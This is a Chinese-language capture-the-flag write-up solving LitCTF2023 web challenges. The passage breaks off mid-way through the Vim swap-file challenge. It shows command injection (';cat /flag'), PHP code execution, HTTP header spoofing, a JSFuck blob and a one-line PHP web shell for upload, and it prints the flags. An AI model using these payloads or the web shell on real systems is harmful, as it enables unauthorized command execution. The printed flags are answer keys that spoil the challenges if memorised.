LitCTF2023(复现)
Web:
1、我Flag呢?
ctrl+u 读取源码,在最后发现了flag:
<!--flag is here flag=NSSCTF{3d5218b9-4e24-4d61-9c15-68f8789e8c48} -->
2、PHP是世界上最好的语言!!
右边那个框下面是 RUN CODE ,结合题目是PHP,推测为RCE,先输入echo 123;看看会发生啥:发现左边输出内容出现了123,那么,直接system(“cat /flag”);成功拿到flag:flag=NSSCTF{b26d3851-52f5-4a80-9e69-6417baf49d68}
3、导弹迷踪
js游戏题,先看源码,这里看game.js:
MG.game = (function () {
/** Constants **/
var GameState = {
WAIT_START: 'wait_start',
STARTING: 'starting',
RUNNING: 'running',
FINISHED: 'finished',
CRASHED: 'crashed'
}
var STARTING_LIVES = 5;
var LEVEL_NUM_BARRIERS = 20;
/** Variables **/
var mState = GameState.WAIT_START;
var mLives = STARTING_LIVES;
var mLevel = 0;
var mRemainingBarriers = 0;
var mBarriersToPass = 0;
var mProgress = 0.0;
var mBestProgress = 0.0;
/* Strings for UI ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
var getLevelString = function () {
return mLevel ? 'LEVEL ' + mLevel : 'QUALIFYING LEVEL';
}
var Messages = {
START: {
title: getLevelString,
text: function () {return 'CLICK TO BEGIN';}
},
CRASH: {
title: function () {return 'CRASHED';},
text: function () {return 'CLICK TO RETRY';}
},
GAME_OVER: {
title: function () {return 'GAME OVER';},
text: function () {return 'CLICK TO START AGAIN';}
},
FINISH: {
title: function () {return 'LEVEL COMPLETED';},
text: function () {if (mLevel === 6) {return 'GOT F|L|A|G {y0u_w1n_th1s_!!!}';} else {return 'CLICK TO CONTINUE';}},
}
};
var getLevelStartVelocity = function (level) {
return 300 + 100*level;
}
var getLevelFinishVelocity = function (level) {
return 400 + 100*level;
}
var getPreLevelIdleVelocity = function (level) {
return 350 + 100*level;
}
var getPostLevelIdleVelocity = function (level) {
return 550 + 100*level;
}
var playCrashAnimation = function () {
// TODO move drawing out of the update loop
// create a copy of the explosion element
var explosion = document.getElementById('explosion');
// play the animation
explosion.firstChild.beginElement();
explosion.setAttribute('visibility', 'visible');
// TODO can't seem to get a callback to fire when the animation
// finishes. Use timeout instead
setTimeout(function (){
var explosion = document.getElementById('explosion');
explosion.setAttribute('visibility', 'hidden');
}, 400);
}
var goWaitStartLevel = function () {
MG.banner.show(Messages.START.title(), Messages.START.text());
MG.util.showMouse();
MG.missile.setAutopilot();
MG.missile.setVelocity(getPreLevelIdleVelocity(mLevel));
if (mLevel === 0) {mLives = Infinity;}
mState = GameState.WAIT_START;
}
/**
*
*/
var goRun = function () {
MG.banner.hide();
MG.util.hideMouse();
/* TODO should the start barrier be pushed here?
If so, should all of the barriers for the entire level be pushed as well? */
mRemainingBarriers = LEVEL_NUM_BARRIERS;
MG.barrierQueue.pushBarrier(MG.BarrierType.START);
mBarriersToPass = LEVEL_NUM_BARRIERS;
MG.missile.setManual();
mState = GameState.STARTING;
}
var goFinish = function () {
MG.banner.show(Messages.FINISH.title(), Messages.FINISH.text());
MG.util.showMouse();
MG.missile.setAutopilot();
MG.missile.setVelocity(getPostLevelIdleVelocity(mLevel));
mState = GameState.FINISHED;
}
var goCrash = function () {
MG.util.showMouse();
if (mLives === 0) {
MG.banner.show(Messages.GAME_OVER.title(), Messages.GAME_OVER.text());
} else {
MG.banner.show(Messages.CRASH.title(), Messages.CRASH.text());
}
playCrashAnimation()
mState = GameState.CRASHED;
}
//==========================================================================
return {
init: function () {
var rootNode = document.getElementById('tunnel');
MG.missile.init();
//
var wallNode;
wallNode = document.createElementNS(NAMESPACE_SVG, 'g');
wallNode.setAttribute('transform', 'scale(1,-1)');
MG.tunnelWall.init(wallNode);
rootNode.appendChild(wallNode);
//
var barrierQueueNode;
barrierQueueNode = document.createElementNS(NAMESPACE_SVG, 'g');
barrierQueueNode.setAttribute('transform', 'scale(1,-1)');
MG.barrierQueue.init(barrierQueueNode);
rootNode.appendChild(barrierQueueNode);
//
goWaitStartLevel();
rootNode.setAttribute('visibility', 'visible');
},
update: function (dt) {
MG.missile.update(dt);
MG.tunnelWall.update(dt);
MG.barrierQueue.update(dt);
/* check whether the nearest barrier has been reached and whether the missile collides with it. */
if (!MG.barrierQueue.isEmpty()) {
if (MG.missile.getOffset() < MG.MISSILE_LENGTH && !MG.missile.isCrashed()){
var barrier = MG.barrierQueue.nextBarrier();
if (barrier.collides(MG.missile.getPosition().x, MG.missile.getPosition().y)) {
// CRASH
MG.missile.onCrash();
goCrash();
} else {
// BARRIER PASSED
MG.barrierQueue.popBarrier();
MG.missile.onBarrierPassed();
// TODO this block makes loads of assumptions about state
if (mState === GameState.RUNNING
|| mState === GameState.STARTING) {
switch(barrier.getType()) {
case MG.BarrierType.FINISH:
goFinish();
break;
case MG.BarrierType.BLANK:
break;
case MG.BarrierType.START:
mState = GameState.RUNNING;
// FALLTHROUGH
default:
mBarriersToPass--;
var startVelocity = getLevelStartVelocity(mLevel);
var finishVelocity = getLevelFinishVelocity(mLevel);
MG.missile.setVelocity(startVelocity
+ (startVelocity - finishVelocity)
* (mBarriersToPass - LEVEL_NUM_BARRIERS)
/ LEVEL_NUM_BARRIERS);
break;
}
}
}
}
}
/* Pad the barrier queue with blank barriers so that there are barriers
as far as can be seen. */
while (MG.barrierQueue.numBarriers() < MG.LINE_OF_SIGHT/MG.BARRIER_SPACING) {
var type = MG.BarrierType.BLANK;
if (mState === GameState.RUNNING
|| mState === GameState.STARTING) {
mRemainingBarriers--;
if (mRemainingBarriers > 0) {
type = MG.BarrierType.RANDOM;
} else if (mRemainingBarriers === 0) {
type = MG.BarrierType.FINISH;
} else {
type = MG.BarrierType.BLANK;
}
}
MG.barrierQueue.pushBarrier(type);
}
/* Update progress */
switch (mState) {
case GameState.RUNNING:
mProgress = 1 - (mBarriersToPass*MG.BARRIER_SPACING + MG.missile.getOffset())/(LEVEL_NUM_BARRIERS * MG.BARRIER_SPACING);
mBestProgress = Math.max(mProgress, mBestProgress);
break;
case GameState.FINISHED:
mProgress = 1;
mBestProgress = 1;
break;
case GameState.STARTING:
mProgress = 0;
break;
default:
break;
}
},
updateDOM: function () {
var position = MG.missile.getPosition();
var offset = MG.missile.getOffset();
MG.barrierQueue.updateDOM(-position.x, -position.y, offset);
MG.tunnelWall.updateDOM(-position.x, -position.y, offset);
},
onMouseMove: function (x, y) {
var windowWidth = window.innerWidth;
var windowHeight = window.innerHeight;
MG.missile.setTarget(x - 0.5*windowWidth, -(y - 0.5*windowHeight));
},
onMouseClick: function () {
if (MG.banner.isFullyVisible()) {
switch (mState) {
case GameState.WAIT_START:
goRun();
break;
case GameState.FINISHED:
/* The player is given an infinite number of lives
during the qualifying level but these should be
removed before continuing. */
if (mLevel === 0) {mLives = STARTING_LIVES;}
mLevel++;
mBestProgress = 0.0;
goWaitStartLevel();
break;
case GameState.CRASHED:
MG.banner.hide();
MG.fog.fadeIn(function() {
if (mLives === 0) {
mLevel = 0;
mLives = STARTING_LIVES;
mBestProgress = 0.0;
} else {
mLives--;
}
MG.missile.reset();
MG.barrierQueue.reset();
MG.fog.fadeOut();
goWaitStartLevel();
});
break;
}
}
},
/* Returns an integer representing the current level */
getLevel: function () {
return mLevel;
},
/* Returns a human readable string describing the current level */
getLevelString: getLevelString,
/* Returns the number of times the player can crash before game over. */
/* If the player crashes with zero lives remaining the game ends */
getNumLives: function () {
return mLives;
},
/* Returns the progress through the level as a value between 0 and 1,
where 0 is not yet started and 1 is completed. */
getProgress: function () {
return mProgress;
},
getBestProgress: function () {
return mBestProgress;
}
};
}());
然后发现重要代码:
text: function () {if (mLevel === 6) {return 'GOT F|L|A|G {y0u_w1n_th1s_!!!}';} else {return 'CLICK TO CONTINUE';}},
成功获得flag:{y0u_w1n_th1s_!!!}
4、Follow me and hack me
直接hackbar传参GET:?CTF=Lit2023 POST:Challenge=i’m_c0m1ng
5、Ping:
尝试ping一下127.0.0.1能通,之后尝试 ;ls 发现不行,被限制了,不过,查看网页源代码发现是前端过滤,禁用js之后就能过了,无脑 ;cat /flag拿到flag: flag=NSSCTF{1a6530af-202d-463c-b4ea-c0447db5b801}
6、1zjs:
这个1z真的1点也不Ez (>_<)
第一件事儿查看源码,发现文件./dist/index.umd.js
在这个文件的注释中找到了一个文件:f@k3f1ag.php
之后访问这个文件:
(+[![]]+[])[+[]]+(+[]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+[]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()(([]+[])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]())[!+[]+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])+(![]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]])()())[!+[]+!+[]+!+[]+[+[]]]+(+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]]+[+[]]+[]+(![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+(![]+[])[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[+[]]+[]+[!+[]+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+[]]+[]+[+!+[]]+[]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(![]+[])[+!+[]]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])
把这个编码过后的东西扔到控制台中,拿到flag:“NSSCTF{0f7f6477-a502-49b1-b7fe-01b2439ab608}”
7、作业管理系统
先看源码,源码最后注释里说了默认的账号和密码都是admin,直接登陆:
之后我不复现了,学校校园网卡我PHP马。
大致说下后续咋做:直接上传php文件,内容是:
<?php system($_POST['cmd']);?>
上传成功后直接读取该文件,然后post传入一个cat /flag即可。
8、Http pro max plus
这题…难蚌。
先是一堆请求头绕过,直接上:
User-Agent: Chrome
Client-Ip:127.0.0.1
via:Clash.win
referer: pornhub.com
之后提示访问 /wtfwtfwtfwtf.php文件
访问了之后看源码又要访问/sejishikong.php文件,之后得到flag:
冲完啦?拿上你的flag赶紧走NSSCTF{714b395b-2dfd-4657-8b5b-c82d04fad401}
9、Vim yyds:
访问 /.index.php.swp之后通过vim -r index.php.swp获取源码(vim泄露):
<html>
<head>
<meta charset="UTF-8">
<style type="text/css">
body,
html {
display: flex;
align-items: center;
justify-content: center;
}
div.vim {
display: flex;
align-content: center;
vertical-align: middle;
justify-content: center;
}
img {
border: none;
width: 8rem;
height: auto;
}
h1.vim_yyds {
color: #50f728;
display: flex;
align-items: flex-start;
justify-content: center;
margin-top: 50;
margin-left: 5px;
}
h3.vim_said {
color: #39c2ff;
display: flex;
justify-content: center;
align-items: center;
}
br,
p {
font-size: 20;
}
</style>
</head>
<body>
<main>
<div class="vim">
<img src="https://www.bing.com/th?id=OSAAS.7B95FA2D97CE022F5E7949F60E350A25&pid=TechQna"></img>
<h1 class="vim_yyds">
Vim yyds
</h1>
</div>
<h3 class="vim_said">
队里师傅说Vim是世界上最好的编辑器,不接受反驳
</h3>
<div class="can_can_vim">
<?php
error_reporting(0);
$password = "Give_Me_Your_Flag";
echo "<p>can can need Vim </p>";
if ($_POST['password'] === base65_encode($password)) {
echo "<p>Oh You got my password!</p>";
eval(system($_POST['cmd']));
}
?>
</div>
</main>
</body>
注意这儿:
<?php
error_reporting(0);
$password = "Give_Me_Your_Flag";
